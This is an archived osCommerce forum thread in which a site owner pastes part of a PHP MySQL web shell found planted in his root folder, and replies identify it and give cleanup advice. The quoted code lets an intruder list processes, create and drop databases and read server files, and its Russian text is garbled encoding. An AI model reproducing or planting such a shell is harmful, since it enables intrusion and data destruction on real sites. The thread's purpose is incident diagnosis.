-------------------*/ print " </td> <td valign=top bgcolor=#E6E7E9>"; /*------------------------ R I G H T B L O C K ! -----------------------*/ if ($connection&&!isset($db)) { $anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>¬ÌËχÌËÂ!<b></td></tr><tr><td bgcolor=red>¿ÌÓÌËÏÌ˚Ï ÔÓθÁÓ‚‡ÚÂÎˇÏ ‡Á¯ÂÌÓ ÔÓ‰Íβ˜ÂÌËÂ Í Ò‚ÂÛ MySQL</td></tr></table>"; } print $form_ad_b; } /*-------------œÓˆÂÒÒ˚ MySql------------*/ if (isset($proc) && $proc=="TRUE"){ $result = mysql_query("SHOW PROCESSLIST", $connection); print "<center><font size=2>œÓˆÂÒÒ˚ MySQL Ò‚‡ [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>"; while ($row = mysql_fetch_array($result, MYSQL_NUM)) { print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>"; } print "</table><br>"; mysql_free_result($result); unset($proc); } /*—ÓÁ‰‡ÂÏ ÌÓ‚Û˛ ·‡ÁÛ*/ if (isset($HTTP_GET_VARS['new_db'])){ $new_db=trim($HTTP_GET_VARS['new_db']); if (mysql_create_db ($new_db)) { print ("<center><font size=2>¡‡Á‡ <b>$new_db</b> ÛÒÔ¯ÌÓ ÒÓÁ‰‡Ì‡</font></center><br>"); print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>"; } else { print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>"; } unset($new_db); } /*”‰‡ÎÂÌË ·‡Á˚*/ if (isset($HTTP_GET_VARS['drop'])){ $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>"); while ( $row_d=mysql_fetch_row($result_d) ){ if ($drop==$row_d[0]) $dr="TRUE"; } if ($dr="TRUE") { mysql_drop_db($drop,$connection); print ("<center><font size=2>¡‡Á‡ <b>$drop</b> ÛÒÔ¯ÌÓ Û‰‡ÎÂ̇</font></center><br>"); print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>"; } unset($drop); } /*-------------◊ËÚ‡ÂÏ ÔÓËÁ‚ÓθÌ˚È Ù‡ÈÎ Ò‚‡-----------*/ if (isset($f)){ print $form_file; } ...........removed long code............ </table> </td></tr> <tr><td> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table>"; ?> Link to comment Share on other sites More sharing options...
Guest Posted March 31, 2011 Share Posted March 31, 2011 John, It is a hacker file. Delete it. Chris Link to comment Share on other sites More sharing options...
ttmw Posted March 31, 2011 Author Share Posted March 31, 2011 John, It is a hacker file. Delete it. Chris I deleted it as soon as i found it, thankfully! I don't understand how it managed to get there though? How do they do it?! On my root folder! I had a recent hack with permissions on 777, but i wouldn't know where to start with finding the cause of this one. :( Link to comment Share on other sites More sharing options...
Taipo Posted March 31, 2011 Share Posted March 31, 2011 That shell code above seems quite focussed on database access so best you take some time to take a look at your database as well. There will also be other files on your site that have had scripts injected into them that allow for files to be uploaded. These can take many forms so if you get a chance have a read of the two discussions in my signature which cover what some of those methods are, and how in some situations, file and directory permissions are of no consequence to preventing this type of intrusion. - Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)- Another discussion about infected files ::here::- A discussion on file permissions ::here::- Site hacked? Should you upgrade or not, some thoughts ::here::- Fix the admin login bypass exploit here- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.